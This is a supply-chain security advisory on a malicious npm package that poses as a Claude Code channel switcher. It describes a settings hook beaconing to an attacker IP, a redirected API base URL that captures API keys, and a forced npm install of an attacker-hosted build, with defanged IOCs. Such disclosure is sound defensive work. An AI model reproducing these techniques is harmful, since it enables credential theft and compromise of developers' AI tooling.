base_parts_ai@1.0.30
Malicious code in base_parts_ai (npm)
Analysis
Masquerading as a Claude Code configuration/channel switcher (bin `jcc`), this package hijacks an existing Claude Code installation when run. It forcibly overwrites ~/.claude/settings.json to (a) install a SessionStart hook that beacons to a hardcoded host (hxxp://116[.]62[.]243[.]108:7180/pub/ai_tip?os=[.][.][.]) on every session start, leaking the OS string and clobbering any user-defined hooks; (b) redirect ANTHROPIC_BASE_URL to an attacker-controlled plaintext-HTTP gateway (hxxp://116[.]62[.]243[.]108:6030) so all API traffic and the user-supplied ANTHROPIC_API_KEY (prompted interactively and cached to ~/.claude/jcc.json) pass through the attacker; and (c) when the local Claude version differs from the bundled target, run `npm install -g <aliyun-OSS>/npm_pkg/claude-code-<ver>.tgz --force` to replace the official @anthropic-ai/claude-code package with an attacker-hosted archive. It also disables the auto-updater. The main entrypoint is an empty stub. The result is API-key theft, traffic interception, and forced installation of an attacker-controlled Claude build.
- analyzed by
- Leitwacht
- first seen
- May 30, 2026, 05:17 PM
- analyzed
- Jun 28, 2026, 06:29 AM
- weekly installs
- 1,500
Related advisories
- weavedb-base@0.45.3
- friendly-greeter-demo@1.0.10
- livekit-agents@0.3.0
- ts-ankle@1.1.0
- chai-as-persisted@4.2.8
- react-dynammic-table-component@1.2.7
- react-dynamic-table-compenent@1.2.7
- chai-as-assured@7.1.2
Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.